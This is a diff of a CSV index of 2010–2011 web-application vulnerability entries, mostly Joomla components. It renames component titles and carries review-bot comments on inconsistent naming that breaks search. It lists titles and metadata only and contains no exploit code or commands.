@ -23840,14 +23841,14 @@ id,file,description,date,author,platform,type,port
14648,platforms/php/webapps/14648.txt,"Guestbook Script PHP - Cross-Site Scripting / HTML Injection",2010-08-15,"AnTi SeCuRe",php,webapps,0
14650,platforms/php/webapps/14650.html,"Zomplog 3.9 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-15,10n1z3d,php,webapps,0
14654,platforms/php/webapps/14654.php,"CMSQLite 1.2 / CMySQLite 1.3.1 - Remote Code Execution",2010-08-15,BlackHawk,php,webapps,0
14655,platforms/php/webapps/14655.txt,"Joomla! Component 'com_equipment' - SQL Injection",2010-08-16,Forza-Dz,php,webapps,0
14655,platforms/php/webapps/14655.txt,"Joomla! Component com_equipment - SQL Injection",2010-08-16,Forza-Dz,php,webapps,0
14656,platforms/php/webapps/14656.txt,"Joomla! Component 'com_jgrid' 1.0 - Local File Inclusion",2010-08-16,"Salvatore Fresta",php,webapps,0
14659,platforms/php/webapps/14659.txt,"Joomla! Component 'com_ongallery' - SQL Injection",2010-08-16,"al bayraqim",php,webapps,0
14672,platforms/php/webapps/14672.txt,"Free Simple Software 1.0 - Remote File Inclusion",2010-08-17,Dr.$audi,php,webapps,0
14684,platforms/php/webapps/14684.php,"Open-Realty 2.5.7 - Local File Disclosure",2010-08-18,"Nikola Petrov",php,webapps,0
14686,platforms/php/webapps/14686.txt,"vbbuletin 4.0.4 - Multiple Vulnerabilities",2010-08-19,mc2_s3lector,php,webapps,0
14707,platforms/php/webapps/14707.txt,"Joomla! Component 'com_Fabrik' - SQL Injection",2010-08-21,Mkr0x,php,webapps,0
14694,platforms/php/webapps/14694.txt,"Joomla! Component 'com_extcalendar' - Blind SQL Injection",2010-08-20,Lagripe-Dz,php,webapps,0
14707,platforms/php/webapps/14707.txt,"Joomla! Component Fabrik - SQL Injection",2010-08-21,Mkr0x,php,webapps,0
14694,platforms/php/webapps/14694.txt,"Joomla! Component com_extcalendar - Blind SQL Injection",2010-08-20,Lagripe-Dz,php,webapps,0
14702,platforms/php/webapps/14702.txt,"Joomla! Component 'com_zina' - SQL Injection",2010-08-21,"Th3 RDX",php,webapps,0
14703,platforms/php/webapps/14703.txt,"Joomla! Component Biblioteca 1.0 Beta - Multiple SQL Injections",2010-08-21,"Salvatore Fresta",php,webapps,0
14704,platforms/asp/webapps/14704.txt,"T-dreams Announcement Script - SQL Injection",2010-08-21,"Br0wn Sug4r",asp,webapps,0
@ -24006,7 +24007,7 @@ id,file,description,date,author,platform,type,port
15153,platforms/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass",2010-09-29,"silent vapor",php,webapps,0
15154,platforms/php/webapps/15154.txt,"MyPhpAuction 2010 - 'id' Parameter SQL Injection",2010-09-29,"BorN To K!LL",php,webapps,0
15160,platforms/asp/webapps/15160.txt,"ASPMass Shopping Cart - Arbitrary File Upload / Cross-Site Request Forgery",2010-09-30,Abysssec,asp,webapps,0
15162,platforms/php/webapps/15162.rb,"Joomla! Component 'com_jejob' - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0
15162,platforms/php/webapps/15162.rb,"Joomla! Component JE Job - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0
15163,platforms/php/webapps/15163.rb,"Joomla! Component JE Directory 1.0 - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0
15164,platforms/php/webapps/15164.txt,"JomSocial 1.8.8 - Arbitrary File Upload",2010-09-30,"Jeff Channell",php,webapps,0
15165,platforms/php/webapps/15165.txt,"zen cart 1.3.9f - Multiple Vulnerabilities",2010-10-01,LiquidWorm,php,webapps,0
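Review bot: row 15162 is retitled from 'com_jejob' to "JE Job", while row 14063, which had the same 'com_jejob' identifier, is retitled to com_jejob in this same change. A title search for either spelling now returns only part of the entries for this component (row 12782 already uses "JE Job 1.0"). Suggest one title form for all three rows.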
@ -24100,7 +24101,7 @@ id,file,description,date,author,platform,type,port
15348,platforms/php/webapps/15348.txt,"Pub-Me CMS - Blind SQL Injection",2010-10-28,H4f,php,webapps,0
15350,platforms/php/webapps/15350.rb,"PHPKit 1.6.1 R2 - overview.php SQL Injection",2010-10-29,"Easy Laster",php,webapps,0
15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System 7.5 - game.php SQL Injection",2010-10-29,"Easy Laster",php,webapps,0
15353,platforms/php/webapps/15353.txt,"Joomla! Component 'com_jfuploader' < 2.12 - Arbitrary File Upload",2010-10-30,Setr0nix,php,webapps,0
15353,platforms/php/webapps/15353.txt,"Joomla! Component com_jfuploader < 2.12 - Arbitrary File Upload",2010-10-30,Setr0nix,php,webapps,0
15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 / 0.2 - 'FCKeditor' Arbitrary File Upload",2010-10-30,Net.Edit0r,php,webapps,0
15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) NewsLetter 4.2 - Cross-Site Scripting / Information Leakage",2010-10-30,p0deje,php,webapps,0
15360,platforms/php/webapps/15360.pl,"MetInfo 2.0 - PHP Code Injection",2010-10-31,Beach,php,webapps,0
@ -24133,25 +24134,25 @@ id,file,description,date,author,platform,type,port
15415,platforms/php/webapps/15415.txt,"MiniBB 2.5 - SQL Injection",2010-11-04,"High-Tech Bridge SA",php,webapps,0
15416,platforms/php/webapps/15416.txt,"JBI CMS - SQL Injection",2010-11-04,Cru3l.b0y,php,webapps,0
15430,platforms/php/webapps/15430.txt,"Joomla! Component ccInvoices - SQL Injection",2010-11-05,FL0RiX,php,webapps,0
15439,platforms/php/webapps/15439.txt,"Joomla! Component 'com_connect' - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps,0
15440,platforms/php/webapps/15440.txt,"Joomla! Component 'com_dcnews' - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps,0
15439,platforms/php/webapps/15439.txt,"Joomla! Component com_connect - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps,0
15440,platforms/php/webapps/15440.txt,"Joomla! Component com_dcnews - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps,0
15441,platforms/php/webapps/15441.txt,"MassMirror Uploader - Remote File Inclusion",2010-11-06,ViciOuS,php,webapps,0
15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion",2010-11-06,ViRuS_HiMa,php,webapps,0
15448,platforms/asp/webapps/15448.txt,"ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0
15451,platforms/php/webapps/15451.pl,"DeluxeBB 1.3 - Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0
15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure",2010-11-07,SYSTEM_OVERIDE,php,webapps,0
15453,platforms/php/webapps/15453.txt,"Joomla! Component Cookex Agency CKForms - Local File Inclusion",2010-11-08,ALTBTA,php,webapps,0
15454,platforms/php/webapps/15454.txt,"Joomla! Component 'com_clan' - SQL Injection",2010-11-08,AtT4CKxT3rR0r1ST,php,webapps,0
15454,platforms/php/webapps/15454.txt,"Joomla! Component com_clan - SQL Injection",2010-11-08,AtT4CKxT3rR0r1ST,php,webapps,0
15455,platforms/php/webapps/15455.txt,"xt:Commerce Shopsoftware 3 / 4 - 'FCKeditor' Arbitrary File Upload",2010-11-08,Net.Edit0r,php,webapps,0
15456,platforms/php/webapps/15456.txt,"Joomla! Component 'com_clanlist' - SQL Injection",2010-11-08,CoBRa_21,php,webapps,0
15456,platforms/php/webapps/15456.txt,"Joomla! Component com_clanlist - SQL Injection",2010-11-08,CoBRa_21,php,webapps,0
15496,platforms/php/webapps/15496.txt,"Metinfo 3.0 - Multiple Vulnerabilities",2010-11-12,anT!-Tr0J4n,php,webapps,0
15459,platforms/php/webapps/15459.txt,"Seo Panel 2.1.0 - Critical File Disclosure",2010-11-08,MaXe,php,webapps,0
15460,platforms/php/webapps/15460.txt,"Joomla! Component ProDesk 1.5 - Local File Inclusion",2010-11-08,d3v1l,php,webapps,0
15466,platforms/php/webapps/15466.txt,"Joomla! Component JQuarks4s 1.0.0 - Blind SQL Injection",2010-11-09,"Salvatore Fresta",php,webapps,0
15465,platforms/php/webapps/15465.rb,"Woltlab Burning Board Userlocator 2.5 - SQL Injection",2010-11-09,"Easy Laster",php,webapps,0
15468,platforms/php/webapps/15468.txt,"Joomla! Component btg_oglas - HTML / Cross-Site Scripting Injection",2010-11-09,CoBRa_21,php,webapps,0
15469,platforms/php/webapps/15469.txt,"Joomla! Component 'com_markt' - SQL Injection",2010-11-09,CoBRa_21,php,webapps,0
15470,platforms/php/webapps/15470.txt,"Joomla! Component 'com_img' - Local File Inclusion",2010-11-09,CoBRa_21,php,webapps,0
15469,platforms/php/webapps/15469.txt,"Joomla! Component com_markt - SQL Injection",2010-11-09,CoBRa_21,php,webapps,0
15470,platforms/php/webapps/15470.txt,"Joomla! Component com_img - Local File Inclusion",2010-11-09,CoBRa_21,php,webapps,0
15484,platforms/php/webapps/15484.txt,"FCKEditor Core 2.x 2.4.3 - (FileManager upload.php) Arbitrary File Upload",2010-11-10,grabz,php,webapps,0
15472,platforms/php/webapps/15472.txt,"osCommerce 2.2 - Cross-Site Request Forgery",2010-11-09,daandeveloper33,php,webapps,0
15473,platforms/multiple/webapps/15473.html,"IBM OmniFind - Cross-Site Request Forgery",2010-11-09,"Fatih Kilic",multiple,webapps,0
@ -24172,7 +24173,7 @@ id,file,description,date,author,platform,type,port
15515,platforms/php/webapps/15515.txt,"Invision Power Board 3 - search_app SQL Injection",2010-11-13,"Lord Tittis3000",php,webapps,0
15516,platforms/php/webapps/15516.txt,"EasyJobPortal - Arbitrary File Upload",2010-11-13,MeGo,php,webapps,0
15517,platforms/php/webapps/15517.txt,"Webmatic - 'index.php' SQL Injection",2010-11-13,v3n0m,php,webapps,0
15518,platforms/php/webapps/15518.txt,"Joomla! Component 'com_ccboard' 1.2-RC - Multiple Vulnerabilities",2010-11-13,jdc,php,webapps,0
15518,platforms/php/webapps/15518.txt,"Joomla! Component CCBoard 1.2-RC - Multiple Vulnerabilities",2010-11-13,jdc,php,webapps,0
15519,platforms/php/webapps/15519.txt,"OneOrZero AIms 2.6.0 Members Edition - Multiple Vulnerabilities",2010-11-13,Valentin,php,webapps,0
15524,platforms/php/webapps/15524.txt,"Pre ADS Portal - Authentication Bypass",2010-11-13,Cru3l.b0y,php,webapps,0
15531,platforms/php/webapps/15531.txt,"BSI Advance Hotel Booking System 1.0 - SQL Injection",2010-11-14,v3n0m,php,webapps,0
@ -24186,7 +24187,7 @@ id,file,description,date,author,platform,type,port
15549,platforms/php/webapps/15549.txt,"Joomla! Component com_alfurqan15x - SQL Injection",2010-11-15,kaMtiEz,php,webapps,0
15553,platforms/asp/webapps/15553.txt,"BPConferenceReporting Web Reporting - Authentication Bypass",2010-11-16,v3n0m,asp,webapps,0
15554,platforms/asp/webapps/15554.txt,"BPRealestate Real Estate - Authentication Bypass",2010-11-16,v3n0m,asp,webapps,0
15555,platforms/php/webapps/15555.txt,"Joomla! Component 'com_maianmedia' - SQL Injection",2010-11-16,v3n0m,php,webapps,0
15555,platforms/php/webapps/15555.txt,"Joomla! Component com_maianmedia - SQL Injection",2010-11-16,v3n0m,php,webapps,0
15557,platforms/php/webapps/15557.txt,"openEngine 2.0 100226 - Local File Inclusion / Cross-Site Scripting",2010-11-16,"SecPod Research",php,webapps,0
15559,platforms/php/webapps/15559.txt,"IceBB 1.0-rc10 - Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",php,webapps,0
15560,platforms/php/webapps/15560.txt,"ClanSphere 2010.0 Final - Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",php,webapps,0
@ -24325,7 +24326,7 @@ id,file,description,date,author,platform,type,port
15824,platforms/php/webapps/15824.txt,"Pligg CMS 1.1.2 - Blind SQL Injection / Cross-Site Scripting",2010-12-25,"Michael Brooks",php,webapps,0
15825,platforms/php/webapps/15825.txt,"openauto 1.6.3 - Multiple Vulnerabilities",2010-12-25,"Michael Brooks",php,webapps,0
15826,platforms/php/webapps/15826.txt,"Traidnt Up 3.0 - Cross-Site Request Forgery",2010-12-25,"P0C T34M",php,webapps,0
15827,platforms/php/webapps/15827.txt,"Joomla! Component 'com_idoblog' - SQL Injection",2010-12-25,NOCKAR1111,php,webapps,0
15827,platforms/php/webapps/15827.txt,"Joomla! Component com_idoblog - SQL Injection",2010-12-25,NOCKAR1111,php,webapps,0
15828,platforms/php/webapps/15828.txt,"Vacation Rental Script 4.0 - Cross-Site Request Forgery",2010-12-25,OnurTURKESHAN,php,webapps,0
15838,platforms/php/webapps/15838.php,"OpenClassifieds 1.7.0.3 - Chained: Captcha Bypass / SQL Injection / Persistent Cross-Site Scripting on FrontPage",2010-12-28,"Michael Brooks",php,webapps,0
15830,platforms/php/webapps/15830.txt,"Social Engine 4.x (Music Plugin) - Arbitrary File Upload",2010-12-25,MyDoom,php,webapps,0
@ -24386,14 +24387,14 @@ id,file,description,date,author,platform,type,port
15979,platforms/php/webapps/15979.txt,"Joomla! - Spam Mail Relay",2011-01-12,"Jeff Channell",php,webapps,0
15987,platforms/cgi/webapps/15987.py,"SiteScape Enterprise Forum 7 - TCL Injection",2011-01-13,"Spencer McIntyre",cgi,webapps,0
16020,platforms/php/webapps/16020.txt,"PHP Lowbids - viewfaqs.php Blind SQL Injection",2011-01-20,"BorN To K!LL",php,webapps,0
15989,platforms/php/webapps/15989.txt,"Joomla! Component 'com_people' 1.0.0 - SQL Injection",2011-01-14,"Salvatore Fresta",php,webapps,0
15989,platforms/php/webapps/15989.txt,"Joomla! Component People 1.0.0 - SQL Injection",2011-01-14,"Salvatore Fresta",php,webapps,0
15993,platforms/php/webapps/15993.html,"ViArt Shop 4.0.5 - Cross-Site Request Forgery",2011-01-15,Or4nG.M4N,php,webapps,0
15995,platforms/php/webapps/15995.txt,"glfusion CMS 1.2.1 - 'img' Persistent Cross-Site Scripting",2011-01-15,Saif,php,webapps,0
15996,platforms/php/webapps/15996.txt,"CompactCMS 1.4.1 - Multiple Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0
15997,platforms/jsp/webapps/15997.py,"MeshCMS 3.5 - Remote Code Execution",2011-01-16,mr_me,jsp,webapps,0
15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 - (bid) Blind SQL Injection",2011-01-16,"BorN To K!LL",php,webapps,0
16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 - Cookie-Rendered Persistent Cross-Site Scripting",2011-01-16,"Mark Stanislav",php,webapps,0
16001,platforms/php/webapps/16001.txt,"Joomla! Component 'com_people' 1.0.0 - Local File Inclusion",2011-01-16,ALTBTA,php,webapps,0
16001,platforms/php/webapps/16001.txt,"Joomla! Component com_people 1.0.0 - Local File Inclusion",2011-01-16,ALTBTA,php,webapps,0
16003,platforms/php/webapps/16003.txt,"AWBS 2.9.2 - (cart.php) Blind SQL Injection",2011-01-16,ShivX,php,webapps,0
16004,platforms/php/webapps/16004.txt,"PHP-Fusion Teams Structure Infusion Addon - SQL Injection",2011-01-17,Saif,php,webapps,0
16006,platforms/cgi/webapps/16006.html,"SmoothWall Express 3.0 - Multiple Vulnerabilities",2011-01-17,"dave b",cgi,webapps,0
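Review bot: 15989 and 16001 in this hunk refer to the same component and version but end up with different names. The new title for 15989 reads "Joomla! Component People 1.0.0 - SQL Injection", while the new title for 16001 reads "Joomla! Component com_people 1.0.0 - Local File Inclusion". Use one form for both rows so a single search on the component returns both entries. A form such as "People (com_people) 1.0.0" would also keep the identifier the old titles were searchable by.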
@ -24645,7 +24646,7 @@ id,file,description,date,author,platform,type,port
17132,platforms/php/webapps/17132.py,"Joomla! Component 'com_virtuemart' 1.1.7 - Blind SQL Injection",2011-04-08,"TecR0c and mr_me",php,webapps,0
17134,platforms/php/webapps/17134.txt,"phpcollab 2.5 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0
17135,platforms/php/webapps/17135.txt,"viscacha 0.8.1 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0
17136,platforms/php/webapps/17136.txt,"Joomla! Component 'com_jce' - Blind SQL Injection",2011-04-09,eidelweiss,php,webapps,0
17136,platforms/php/webapps/17136.txt,"Joomla! Component joomlacontenteditor - Blind SQL Injection",2011-04-09,eidelweiss,php,webapps,0
17137,platforms/php/webapps/17137.txt,"Nooms CMS 1.1.1 - Cross-Site Request Forgery",2011-04-09,loneferret,php,webapps,0
17178,platforms/php/webapps/17178.txt,"Blue Hat - Sensitive Database Disclosure / SQL Injection",2011-04-16,^Xecuti0N3r,php,webapps,0
17179,platforms/php/webapps/17179.txt,"Bedder CMS - Blind SQL Injection",2011-04-16,^Xecuti0N3r,php,webapps,0
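Review bot: the new title for 17136 replaces 'com_jce' with "joomlacontenteditor", a lowercase run-together string that is neither the component identifier nor a readable product name, so anything matching this CSV on com_jce stops finding the entry. Keep com_jce in the description, or spell the product name out with the identifier alongside it. The unchanged 17132 row in the same hunk still uses the quoted 'com_virtuemart' form, so the file mixes conventions after this change.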
@ -24696,7 +24697,7 @@ id,file,description,date,author,platform,type,port
17251,platforms/php/webapps/17251.html,"VCalendar 1.1.5 - Cross-Site Request Forgery",2011-05-06,"High-Tech Bridge SA",php,webapps,0
17259,platforms/cgi/webapps/17259.txt,"f-fileman 7.0 - Directory Traversal",2011-05-07,"Raffaele Forte",cgi,webapps,0
17264,platforms/php/webapps/17264.txt,"Joomla! Component 'com_versioning' - SQL Injection",2011-05-09,the_cyber_nuxbie,php,webapps,0
17265,platforms/php/webapps/17265.txt,"Joomla! Component 'com_hello' - SQL Injection",2011-05-09,the_cyber_nuxbie,php,webapps,0
17265,platforms/php/webapps/17265.txt,"Joomla! Component com_hello - SQL Injection",2011-05-09,the_cyber_nuxbie,php,webapps,0
17267,platforms/php/webapps/17267.txt,"Traidnt UP 2.0 - (view.php) SQL Injection",2011-05-10,ScOrPiOn,php,webapps,0
17276,platforms/windows/webapps/17276.txt,"Oracle GlassFish Server - Administration Console Authentication Bypass",2011-05-12,"Core Security",windows,webapps,0
17284,platforms/php/webapps/17284.txt,"WordPress Plugin EditorMonkey 2.5 - 'FCKeditor' Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0
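Review bot: 17264 keeps the quoted form 'com_versioning' while 17265 directly below it, with the same author and date, is rewritten to the unquoted com_hello. If the intent is to drop the quotes around component identifiers, 17264 should change in the same commit. Otherwise these two adjacent rows no longer match the same search pattern.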
@ -24710,7 +24711,7 @@ id,file,description,date,author,platform,type,port
17297,platforms/php/webapps/17297.txt,"Jcow 4.2.1 - Local File Inclusion",2011-05-16,"AutoSec Tools",php,webapps,0
17299,platforms/php/webapps/17299.txt,"WordPress Plugin Is-human 1.4.2 - Remote Command Execution",2011-05-17,neworder,php,webapps,0
17301,platforms/php/webapps/17301.txt,"Pligg CMS 1.1.4 - SQL Injection",2011-05-17,Null-0x00,php,webapps,0
17303,platforms/php/webapps/17303.txt,"Joomla! Component 'com_jdownloads' 1.0 - Arbitrary File Upload",2011-05-18,Al-Ghamdi,php,webapps,0
17303,platforms/php/webapps/17303.txt,"Joomla! Component jDownloads 1.0 - Arbitrary File Upload",2011-05-18,Al-Ghamdi,php,webapps,0
17307,platforms/php/webapps/17307.txt,"Ultimate PHP Board 2.2.7 - Broken Authentication and Session Management",2011-05-20,i2sec,php,webapps,0
17308,platforms/php/webapps/17308.txt,"Zen Cart 1.3.9h - Multiple Vulnerabilities",2011-05-20,"Dr. Alberto Fontanella",php,webapps,0
17309,platforms/php/webapps/17309.txt,"PHP Captcha / Securimage 2.0.2 - Authentication Bypass",2011-05-20,"Sense of Security",php,webapps,0
@ -24814,7 +24815,7 @@ id,file,description,date,author,platform,type,port
17554,platforms/php/webapps/17554.txt,"Mevin Basic PHP Events Lister 2.03 - Cross-Site Request Forgery",2011-07-21,Crazy_Hacker,php,webapps,0
17551,platforms/jsp/webapps/17551.txt,"Oracle Sun GlassFish Enterprise Server - Persistent Cross-Site Scripting",2011-07-20,"Sense of Security",jsp,webapps,0
17555,platforms/php/webapps/17555.txt,"vBulletin 4.0.x 4.1.3 - (messagegroupid) SQL Injection",2011-07-21,fb1h2s,php,webapps,0
17556,platforms/php/webapps/17556.txt,"Joomla! Component 'com_jesubmit' - Local File Inclusion",2011-07-21,v3n0m,php,webapps,0
17556,platforms/php/webapps/17556.txt,"Joomla! Component JE Story Submit - Local File Inclusion",2011-07-21,v3n0m,php,webapps,0
17560,platforms/php/webapps/17560.txt,"Joomla! Component 'mod_spo' - SQL Injection",2011-07-21,SeguridadBlanca,php,webapps,0
17562,platforms/php/webapps/17562.php,"ExtCalendar2 - (Authentication Bypass/Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0
17574,platforms/jsp/webapps/17574.php,"CA ARCserve D2D r15 GWT RPC - Multiple Vulnerabilities",2011-07-26,rgod,jsp,webapps,0
@ -24828,14 +24829,14 @@ id,file,description,date,author,platform,type,port
17586,platforms/jsp/webapps/17586.txt,"ManageEngine ServiceDesk Plus 8.0 Build 8013 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-29,"Narendra Shinde",jsp,webapps,0
17587,platforms/php/webapps/17587.txt,"Link Station Pro - Multiple Vulnerabilities",2011-07-30,"$#4d0\/\/[r007k17]",php,webapps,0
17590,platforms/php/webapps/17590.txt,"Digital Scribe 1.5 - (register_form()) Multiple POST Cross-Site Scripting Vulnerabilities",2011-07-31,LiquidWorm,php,webapps,0
17591,platforms/php/webapps/17591.txt,"Joomla! Component 'com_obSuggest' - Local File Inclusion",2011-07-31,v3n0m,php,webapps,0
17591,platforms/php/webapps/17591.txt,"Joomla! Component obSuggest - Local File Inclusion",2011-07-31,v3n0m,php,webapps,0
17592,platforms/php/webapps/17592.txt,"CMSPro! 2.08 - Cross-Site Request Forgery",2011-08-01,Xadpritox,php,webapps,0
17593,platforms/php/webapps/17593.txt,"ZoneMinder 1.24.3 - Remote File Inclusion",2011-08-01,iye,php,webapps,0
17595,platforms/php/webapps/17595.txt,"MyBB MyTabs Plugin - SQL Injection",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0
17594,platforms/jsp/webapps/17594.rb,"CA Arcserve D2D GWT RPC - Credential Information Disclosure (Metasploit)",2011-08-01,Metasploit,jsp,webapps,0
17597,platforms/php/webapps/17597.txt,"SiteGenius - Blind SQL Injection",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0
17602,platforms/php/webapps/17602.txt,"WordPress Plugin TimThumb 1.32 - Remote Code Execution",2011-08-03,MaXe,php,webapps,0
17603,platforms/php/webapps/17603.txt,"Joomla! Component 'com_jdirectory' - SQL Injection",2011-08-03,"Caddy Dz",php,webapps,0
17603,platforms/php/webapps/17603.txt,"Joomla! Component com_jdirectory - SQL Injection",2011-08-03,"Caddy Dz",php,webapps,0
17606,platforms/multiple/webapps/17606.txt,"DZYGroup CMS Portal - Multiple SQL Injections",2011-08-04,Netrondoank,multiple,webapps,0
17613,platforms/php/webapps/17613.php,"WordPress Plugin E-Commerce 3.8.4 - SQL Injection",2011-08-05,IHTeam,php,webapps,0
17615,platforms/jsp/webapps/17615.rb,"Sun/Oracle GlassFish Server - Authenticated Code Execution (Metasploit)",2011-08-05,Metasploit,jsp,webapps,0
@ -24852,7 +24853,7 @@ id,file,description,date,author,platform,type,port
17640,platforms/php/webapps/17640.txt,"BlogPHP 2.0 - Persistent Cross-Site Scripting",2011-08-09,Paulzz,php,webapps,0
17641,platforms/php/webapps/17641.txt,"LaserNet CMS 1.5 - SQL Injection (1)",2011-08-09,p0pc0rn,php,webapps,0
17644,platforms/php/webapps/17644.txt,"FCKEditor Core - (FileManager test.html) Arbitrary File Upload (2)",2011-08-09,pentesters.ir,php,webapps,0
17646,platforms/php/webapps/17646.txt,"Joomla! Component 'com_esearch' - SQL Injection",2011-08-09,NoGe,php,webapps,0
17646,platforms/php/webapps/17646.txt,"Joomla! Component Search 3.0.0 - SQL Injection",2011-08-09,NoGe,php,webapps,0
17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 - DOM Cross-Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0
17666,platforms/php/webapps/17666.txt,"Prediction Football 2.51 - Cross-Site Request Forgery",2011-08-14,"Smith Falcon",php,webapps,0
17660,platforms/php/webapps/17660.txt,"VideoDB 3.1.0 - SQL Injection",2011-08-13,seceurityoverun,php,webapps,0
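Review bot: the new title for 17646, "Joomla! Component Search 3.0.0 - SQL Injection", adds a version (3.0.0) that the old title did not carry and replaces 'com_esearch' with the generic word "Search". Confirm the version against 17646.txt. Keep com_esearch in the description so the row can still be told apart from other search components and is still found by identifier.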
@ -24860,7 +24861,7 @@ id,file,description,date,author,platform,type,port
17662,platforms/php/webapps/17662.txt,"Mambo 4.6.x < 4.6.5 - SQL Injection",2011-08-13,"Aung Khant",php,webapps,0
17667,platforms/php/webapps/17667.php,"Contrexx ShopSystem 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,php,webapps,0
17673,platforms/php/webapps/17673.txt,"WordPress Plugin IP-Logger 3.0 - SQL Injection",2011-08-16,"Miroslav Stampar",php,webapps,0
17674,platforms/php/webapps/17674.txt,"Joomla! Component 'com_joomtouch' - Local File Inclusion",2011-08-17,NoGe,php,webapps,0
17674,platforms/php/webapps/17674.txt,"Joomla! Component JoomTouch 1.0.2 - Local File Inclusion",2011-08-17,NoGe,php,webapps,0
17675,platforms/php/webapps/17675.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection",2011-08-17,v3n0m,php,webapps,0
17677,platforms/php/webapps/17677.txt,"WordPress Plugin File Groups 1.1.2 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0
17678,platforms/php/webapps/17678.txt,"WordPress Plugin Contus HD FLV Player 1.3 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0
@ -24900,7 +24901,7 @@ id,file,description,date,author,platform,type,port
17730,platforms/php/webapps/17730.txt,"WordPress Plugin oQey Headers 0.3 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0
17731,platforms/php/webapps/17731.txt,"WordPress Plugin Photoracer 1.0 - Multiple Vulnerabilities",2011-08-27,"Yakir Wizman",php,webapps,0
17733,platforms/asp/webapps/17733.txt,"Ferdows CMS Pro 1.1.0 - Multiple Vulnerabilities",2011-08-28,AmnPardaz,asp,webapps,0
17734,platforms/php/webapps/17734.txt,"Joomla! Component 'com_jce' 2.0.10 - Multiple Vulnerabilities",2011-08-28,AmnPardaz,php,webapps,0
17734,platforms/php/webapps/17734.txt,"Joomla! Component joomlacontenteditor 2.0.10 - Multiple Vulnerabilities",2011-08-28,AmnPardaz,php,webapps,0
17736,platforms/php/webapps/17736.txt,"Joomla! Component 'mod_simpleFileLister' 1.0 - Directory Traversal",2011-08-28,evilsocket,php,webapps,0
17737,platforms/php/webapps/17737.txt,"WordPress Plugin Facebook Promotions 1.3.3 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0
17738,platforms/php/webapps/17738.txt,"WordPress Plugin Evarisk 5.1.3.6 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0
@ -33200,7 +33201,7 @@ id,file,description,date,author,platform,type,port
34015,platforms/php/webapps/34015.txt,"SoftDirec 1.05 - 'delete_confirm.php' Cross-Site Scripting",2010-05-19,indoushka,php,webapps,0
34016,platforms/php/webapps/34016.txt,"Snipe Gallery 3.1 - gallery.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0
34017,platforms/php/webapps/34017.txt,"Snipe Gallery 3.1 - image.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0
34021,platforms/php/webapps/34021.txt,"Joomla! Component 'com_horses' - 'id' Parameter SQL Injection",2010-05-19,"Kernel Security Group",php,webapps,0
34021,platforms/php/webapps/34021.txt,"Joomla! Component com_horses - 'id' Parameter SQL Injection",2010-05-19,"Kernel Security Group",php,webapps,0
34022,platforms/php/webapps/34022.txt,"StivaSoft Stiva SHOPPING CART 1.0 - 'demo.php' Cross-Site Scripting",2010-01-13,PaL-D3v1L,php,webapps,0
34023,platforms/php/webapps/34023.txt,"Lisk CMS 4.4 - 'id' Parameter Multiple Cross-Site Scripting / SQL Injection",2010-05-20,"High-Tech Bridge SA",php,webapps,0
34024,platforms/php/webapps/34024.txt,"Triburom - 'forum.php' Cross-Site Scripting",2010-01-15,ViRuSMaN,php,webapps,0
@ -33280,7 +33281,7 @@ id,file,description,date,author,platform,type,port
34128,platforms/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80
34161,platforms/php/webapps/34161.txt,"WordPress Plugin Video Gallery 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",php,webapps,80
34149,platforms/hardware/webapps/34149.txt,"Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",hardware,webapps,0
34159,platforms/php/webapps/34159.txt,"Joomla! Component 'com_galleryxml' 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,php,webapps,0
34159,platforms/php/webapps/34159.txt,"Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,php,webapps,0
34163,platforms/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,hardware,webapps,0
34165,platforms/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 (x64) - Persistent Cross-Site Scripting",2014-07-25,"Dolev Farhi",multiple,webapps,0
